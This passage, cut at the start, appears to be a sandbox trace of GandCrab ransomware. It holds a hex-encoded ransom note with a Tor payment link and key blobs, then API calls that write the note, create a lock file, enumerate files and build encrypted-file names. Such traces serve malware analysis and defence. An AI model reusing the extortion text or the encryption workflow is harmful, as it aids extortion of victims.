x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.327] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0072.328] CloseHandle (hObject=0x2cc) returned 1 [0072.328] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.329] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.329] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x27d)) [0072.329] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.329] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.329] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.330] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a09d2ca4deb61a.lock") returned 92 [0072.330] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0072.330] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.330] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.331] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\") returned 68 [0072.331] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*" [0072.331] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5033b8 [0072.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.331] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.332] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.332] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.332] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.332] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.332] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a09d2ca4deb61a.lock" [0072.332] lstrlenW (lpString=".titwmvjl") returned 9 [0072.332] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a09d2ca4deb61a.lock") returned 92 [0072.332] VirtualAlloc (lpAddress=0x0, dwSize=0xf8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.332] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 101 [0072.332] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a09d2ca4deb61a.lock") returned 92 [0072.332] lstrlenW (lpString=".lock") returned 5 [0072.332] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.332] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.332] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 